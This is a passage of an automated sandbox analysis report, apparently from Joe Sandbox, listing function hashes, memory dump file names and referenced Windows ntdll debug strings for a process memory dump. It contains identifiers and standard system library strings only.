                                                  • Instruction Fuzzy Hash: 5DE0AE343042059FDB15CF19C040B62B7A6BFE5B10F28C068A8488F306EB32A8438A40
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: f7ad52954fa9bb938e97a20564faeea2fb5741f47f4a473d8e562e188841c31b
                                                  • Instruction ID: d7892aa062d724ad734589f67c662c2318e1751ce7297895eed6473818bb4f6a
                                                  • Opcode Fuzzy Hash: f7ad52954fa9bb938e97a20564faeea2fb5741f47f4a473d8e562e188841c31b
                                                  • Instruction Fuzzy Hash: 38E08C321005606BE215FA6DDE10F4A779AEFA8264F010121B551972A0CA68BC50C794
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 513c018af8093926a425ffcf59a89caa6ba2b1d98b48f3b0c5e1abf4a0335a68
                                                  • Instruction ID: 55dee0646a142e8c249644521d990a102de4a203ea2da48d467beea33890f0eb
                                                  • Opcode Fuzzy Hash: 513c018af8093926a425ffcf59a89caa6ba2b1d98b48f3b0c5e1abf4a0335a68
                                                  • Instruction Fuzzy Hash: 5CD05E31161660EFE7326F25EE05F87BAB5EF80B14F0516A8B001264F086A5FD94CA90
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                  • Instruction ID: 0e008d93bf1be5670bd5f23c7e002c66a6770c44d787c6c5a05d8c5efd386e9a
                                                  • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                  • Instruction Fuzzy Hash: 09D0A932204620ABE732AE2CFC00FD373E8AF88720F060459B008C7050C364BC81CA84
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                  • Instruction ID: 28079ccca1eed9339f9f69cef63b34a9f07bfd5e1e030a63f6657890af011eb9
                                                  • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                  • Instruction Fuzzy Hash: B4D02232312030A3CB286A617920F6379099F80BA4F0A022C380A93C40C0089C42E2E0
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                  • Instruction ID: 3c43b83c37d729651dd5f48b69f469b30c37f480815eefe1c20c0c959cfcfa49
                                                  • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                  • Instruction Fuzzy Hash: 0AC08C33290658AFD712EFA8CE01F027BA9EB9CB50F000021F7048B670C635FC20EA84
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 228d46562787cc6ef91b6aff40b17c30ce715ed8b58bcfbb69b93c396a4a2043
                                                  • Instruction ID: c62c07373c0aaab71302367dea29eb9bf0e3f6e08a4dcc29521348603ca6229f
                                                  • Opcode Fuzzy Hash: 228d46562787cc6ef91b6aff40b17c30ce715ed8b58bcfbb69b93c396a4a2043
                                                  • Instruction Fuzzy Hash: FFC08C701455906AEB2B5B50CA00B283650AF0471BFA4219CAE40A94A1C36CB8128218
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                  • Instruction ID: 28f072799396b40a4e000fe6c7cf503037ddc7f9fb36de5a28e8a9c2c513b820
                                                  • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                  • Instruction Fuzzy Hash: F5C04879701A428FDF15DF2AD394F4977E4FB84745F156890E806CBB26E628F805CA10
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: ___swprintf_l
                                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                  • API String ID: 48624451-2108815105
                                                  • Opcode ID: 24b263eda04a7e8456915146079ad79857f3e6a0ebd82de4cf1ae4c823a7dd69
                                                  • Instruction ID: 508272ff550c7bbe40a342cf0a1fb9df865d259e715fdeeea702a98345532892
                                                  • Opcode Fuzzy Hash: 24b263eda04a7e8456915146079ad79857f3e6a0ebd82de4cf1ae4c823a7dd69
                                                  • Instruction Fuzzy Hash: 5D51D8B5B046167FDB10EF98899097FF7B8BF08204754926AE8A5D7641E234FE508FE0
                                                  Strings
                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04384742
                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04384655
                                                  • ExecuteOptions, xrefs: 043846A0
                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04384725
                                                  • Execute=1, xrefs: 04384713
                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 04384787
                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 043846FC
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                  • API String ID: 0-484625025
                                                  • Opcode ID: 42b574875d2878a2594de856179d3138dd967cdc9dc5a79b9e348c13a7dbbb85
                                                  • Instruction ID: cc3252e6ba914747a82244450a748728545c9acac75fb92b087a4062919a606e
                                                  • Opcode Fuzzy Hash: 42b574875d2878a2594de856179d3138dd967cdc9dc5a79b9e348c13a7dbbb85
                                                  • Instruction Fuzzy Hash: C251F431700219AAFF14AEA4DC85FFAB7EDEF94304F4410A9E905A7190EB71BE458F50
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: __aulldvrm
                                                  • String ID: +$-$0$0
                                                  • API String ID: 1302938615-699404926
                                                  • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                  • Instruction ID: eb6e7fc25db8f55a8e6cdd2912dcff62849376089d7e521e65bdf6f534c7d5ab
                                                  • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                  • Instruction Fuzzy Hash: 8F81A070E052899EEF288E68C891FFEFBB5AF45350F186559DC61A72A0D734B8408B64
                                                  Strings
                                                  • RTL: Resource at %p, xrefs: 04387B8E
                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 04387B7F
                                                  • RTL: Re-Waiting, xrefs: 04387BAC
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                  • API String ID: 0-871070163
                                                  • Opcode ID: 1d2e1c64ff8957148c765703f5c96237420129914e66acfe7258d5e14d79af93
                                                  • Instruction ID: 89946b68d318980a09160dd93959fab862ab7eceb2a38100f1959f8ff5962d88
                                                  • Opcode Fuzzy Hash: 1d2e1c64ff8957148c765703f5c96237420129914e66acfe7258d5e14d79af93
                                                  • Instruction Fuzzy Hash: F641BF353017029FDB24DE258C40BAAF7E6EFC8710F101A2DE95A9B680DB31F9458BA1
                                                  APIs
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0438728C
                                                  Strings
                                                  • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 04387294
                                                  • RTL: Resource at %p, xrefs: 043872A3
                                                  • RTL: Re-Waiting, xrefs: 043872C1
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                  • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                  • API String ID: 885266447-605551621
                                                  • Opcode ID: 5ff57d8c5069c64b79b64d77857c345858c0c0014f6ab74a18936b669abd6c21
                                                  • Instruction ID: b512bcceb9c2ad92d7a66542dbeca3a955b163ee43726def1204a0cd930c27eb
                                                  • Opcode Fuzzy Hash: 5ff57d8c5069c64b79b64d77857c345858c0c0014f6ab74a18936b669abd6c21
                                                  • Instruction Fuzzy Hash: B041AE35700706ABEB20EE25CC41B6AF7E6EF84714F242619F995EB640DB31F8528BD1
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID: __aulldvrm
                                                  • String ID: +$-
                                                  • API String ID: 1302938615-2137968064
                                                  • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                  • Instruction ID: 08f32e5b8c90a1fffa7e138c94459950de7194055c05b09df2ac3ccdaa30a06b
                                                  • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                  • Instruction Fuzzy Hash: 69919270E0021A9FDF24DF69C881EBEB7A5EF44720F54651AEC55E72E0E730B9418B60
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000016.00000002.2534428283.00000000042E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 042E0000, based on PE: true
                                                  • Associated: 00000016.00000002.2534428283.0000000004409000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000440D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000016.00000002.2534428283.000000000447E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_22_2_42e0000_clip.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: $$@
                                                  • API String ID: 0-1194432280
                                                  • Opcode ID: 01e297618772ade4b5ed5e917eaa0d6cd1c6dccd7036dc61ffd371714f312605
                                                  • Instruction ID: 67813948330cb832f9e97605dbf5cce172d4a105cfe4bb3446a68d6f4f494e32
                                                  • Opcode Fuzzy Hash: 01e297618772ade4b5ed5e917eaa0d6cd1c6dccd7036dc61ffd371714f312605
                                                  • Instruction Fuzzy Hash: 22810DB1D002699BEB35DB54CD44BEEB7B8AF08714F0051EAA919B7250D7746E84CF60